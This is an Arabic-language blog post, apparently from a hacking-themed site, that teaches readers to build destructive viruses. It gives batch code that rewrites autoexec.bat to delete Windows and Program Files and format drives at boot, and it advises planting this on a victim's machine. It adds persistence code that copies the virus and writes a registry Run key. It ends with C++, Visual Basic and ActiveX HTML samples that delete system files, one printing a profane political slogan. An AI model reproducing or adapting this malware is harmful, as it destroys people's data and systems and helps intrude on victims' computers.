نبدا بتوضيح الكود : فكما نرى فى الكود اول سطر مجرد فائدته مسح الشاشة من أي أمر أو تعليق مسبق حتى يجعل عمل هذا الفيروس هو الوحيد
بعدها سوف نجد مجموعة من السطور هي تقريبا مكرره فكرتها وليس مكرر عملها ولكن يمكننا أن نوضح انه هناك 3 أكود منفصلة هي الفكرة الأساسيه و هي ما سوف نوضحه
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat

 يعطي هذا المود الأمر للكمبيوتر بمسح الفولدر program files والذى يوجد فيه جميع البرامج التي تنزل على الجهاز و نلاحظ تكراره في مسح الويندوز فى الكود
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
ولكنه اذا قام بمسح الويندوز فهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك أعطى أمر نسخ لهذين الأمرين حتى يمكننا استخدامهم فيما بعد و هذا هو ما اعطاه هذان السطرين
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
اما بعد ذلك فهو أعطاه الأمر بعمل فورمات للجهاز و هذا كما هو موجود فى السطر التالى
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
أولا يوجد بعض الأمور يجب توضيحها قبل البدء في هذا الموضوع وهو أنه بوضع هذا الفيروس فى الـC:
سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه فى هذا partion اما إذا كنت في عملية هكر لجهاز فقم تحميل هذا الفيروس الى الـC: عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه
ولاكني وجدت فيه عيب بسيط و هو أن هذا الفيروس لن يعمل فى جهاز وضع فيه غير ملف windows فمثلا إذا كان هناك ضحيه يوجد عندها ويندوز موضوع داخل ملف win98 فإن الفيروس الذي كوناه لن يقوم ببعض الأعمال و هي نسخ الأوامر و مسح الويندوز ولكنه سوف يقوم بعمل فورمات
أما بالنسبة لتعديله فكل ما أستطيع أن أعطيكم إياه من تعديل مفيد فيه و هو أن تمسحوا أوامر مسح الويندوز و Program files و تدع أمر الفورمات مع تغيير مثلا أنه يقوم بفورمات على الـ D: فيكون لكود كما يلى


كود:
echo off@ 
cls 
call attrib -h -r c:\autoexec.bat >nul 
echo @echo off >c:\autoexec.bat 
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
----------------
الكود الثالث :
--------------

كود:
code:--------------------------------------------------------------------------------echo off@ 
cls 
call attrib -h -r c:\autoexec.bat >nul 
echo @echo off >c:\autoexec.bat 
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat 
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat 
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat 
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat 
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
يعتبر هذا الفيروس نفس عمل السابق لذا انا لست بحاجه الى توضيحه او اخباركم بما انتم يجب ان تقومو به حتى تعدلوه
كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمه بـ Autoexec.bat
الآن و بعد أن تعرفنا على الأكواد السابقة ما رأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده
الخاصــــــــــــــية الأولى :-
كود:
On Error Resume Next 
Dim copy, copy2 
copy = "c:\virus.exe" 
copy2 = "c:\windows\system\Project12.exe" 
FileCopy copy, copy2
يعطي هذا الكود للفيروس خاصية نسخ نفسه إلى مكان آخر حتى لا يمكن للضحيه ايقافه بمجرد مسحه .
الخاصــــــــــــــية الثانيه :-
كود:
Option Explicit 
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long 
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long 
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long 
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long 
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long 
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long 
Private Const REG_SZ = 1 
Private Const LOCALMACHINE = &H80000002 
Private Sub Command1_Click() 
Dim InputValue As String 
Dim nBufferKey As Long, nBufferSubKey As Long 
RegCreateKey LOCALMACHINE, "SOFTWARE\JPRODUCTIONS", nBufferKey 
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey 
RegOpenKey nBufferKey, "Run-", nBufferSubKey 
InputValue = "c:\windows\system\Project12.exe" 
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey 
RegOpenKey nBufferKey, "Run-", nBufferSubKey 
RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue) 
End Sub
يعطى هذا الكود للفيروس خاصية انه يمكنه من ان يشتغل تلقائيا عند فتح الجهاز و هذا عن طريق تعديل ال registry :
هذا هو كل ما حصلت عليه من أكواد للفيروسات فلقد شرحت لكم مجموعه من أكواد الفيروسات التي يمكننا استخدامها و مجموعه من الأكواد التى بإضافتها للفيروس تعطي له خصائص مفيدة
يتبقى لنا شيء بسيط وهو هذا الجزء و هو مجموعة أكواد لبعض الفيروسات
______________
فيرووس C++ :
*****************
كود:
#include<stdio.h> 
#include<conio.h> 
#include<stdlib.h> 
main() 
{ 
clrscr(); 
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n"); 
printf("\t\tFuck -oO Israel Oo- and -oO America Oo-\n\n"); 
remove("c:\\windows\\system.ini"); 
remove("c:\\windows\\win.ini"); 
remove("c:\\autoexec.bat"); 
remove("c:\\msdos.sys"); 
remove("c:\\io.sys"); 
remove("c:\\command.com"); 
remove("c:\\config.sys"); 
remove("c:\\windows\\ebd\\command.com"); 
remove("c:\\windows\\ebd\\ebd.cab"); 
remove("c:\\windows\\ebd\\Autoexec.bat"); 
remove("c:\\windows\\ebd\\setramd.bat"); 
remove("c:\\windows\\ebd\\Findramd.exe"); 
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe"); 
printf("Windows destroyed ...\n\n"); 
system("PAUSE"); 
}
فيرووس Visual Basic :
*****************
كود:
SetAttr "c:\autoexec.bat", vbNormal 
SetAttr "c:\msdos.sys", vbNormal 
SetAttr "c:\io.sys", vbNormal 
SetAttr "c:\windows\win.ini", vbNormal 
SetAttr "c:\windows\system.ini", vbNormal 
SetAttr "c:\command.com", vbNormal 
SetAttr "c:\config.sys", vbNormal 
SetAttr "c:\windows\rundll.exe", vbNormal 
SetAttr "c:\windows\rundll32.exe", vbNormal 
Kill "C:\autoexec.bat" 
Kill "C:\msdos.sys" 
Kill "C:\io.sys" 
Kill "C:\windows\win.ini" 
Kill "C:\windows\system.ini" 
Kill "C:\command.com" 
Kill "C:\config.sys" 
Kill "C:\windows\rundll.exe" 
Kill "C:\windows\rundll32.exe"
فيروس Html
*****************
كود:
<html> 
<head> 
************************ ****************************************="Content-Type" 
content="text/html; charset=iso-8859-1"> 
<title>Active-X HTML</title> 
</head> 
THIS HTML USING ACTIVE-X PLEASE CLICK #YES# 
<body bgcolor="#000000" Text="#C0C0C0"> 
<script language="VBScript"> 
<!-- This is a MY BRAIN --!> 
On Error Resume Next 
Dim a 
Set fso = CreateObject("Scripting.FileSystemObject") 
Set a = fso.GetFile("win.ini") 
a.Delete 
Dim b 
Set fso = CreateObject("Scripting.FileSystemObject") 
Set b = fso.GetFile("system.ini") 
b.Delete 
</script> 
<!--- This script author is THEONE---!> 
</body> 
</html>
( ملاحظة يحفظ هذا الفيروس بأمتداد html .* )
يمكنك من دراسة هذه الأكواد و النظر فيها إلى ما قد يفيدكم فيمكنكم نقل بعض الأجزاء من الفيروسات السابقة و عمل فيروس قوى يخصكم
هذا هو كل ما لدي فى هذا الجزء و هو كما قلت لكم سابقا هو قابل للتطوير
ولا تنسوا ....... ردودكم الطيبة
بواسطة Unknown
تصنيف :

Popular Post

Blogger templates

أقسام المدونة

قائمة المدونات الإلكترونية

تابعنا على الفيسبوك

https://www.facebook.com/pages/Hamzapro3/1492091174356542?skip_nax_wizard=true

عن موقع أوبنتو العرب

إجمالي مرات مشاهدة الصفحة

أخبار ريال مدريد

هل اعجبكم الموضوع لاتنسو مشاركتنا تعليقاتكم

هل اعجبكم الموضوع لاتنسو مشاركتنا تعليقاتكم

    المتابعون

    تعديل

    we are anonymous

    http://hamzapro3.blogspot.com/

    http://hamzapro3.blogspot.com/

    تعديل

    hack world

    2

    2

    http://hamzapro3.blogspot.com/

    http://hamzapro3.blogspot.com/

    تابعنا ع الفيس بوك

    أقسام المدونة

    hamza kambouch

    القائمة البريدية

    المشاركات الشائعة

    hack

    تعديل

    يتم التشغيل بواسطة Blogger.

    http://hamzapro3.blogspot.com/

    المشاركات الشائعة

    المواضيع النشطة

    - copyright © worldprofessional -Metrominimalist- Powered by Blogger - Designed by Johanes Djogan custom blogger templates -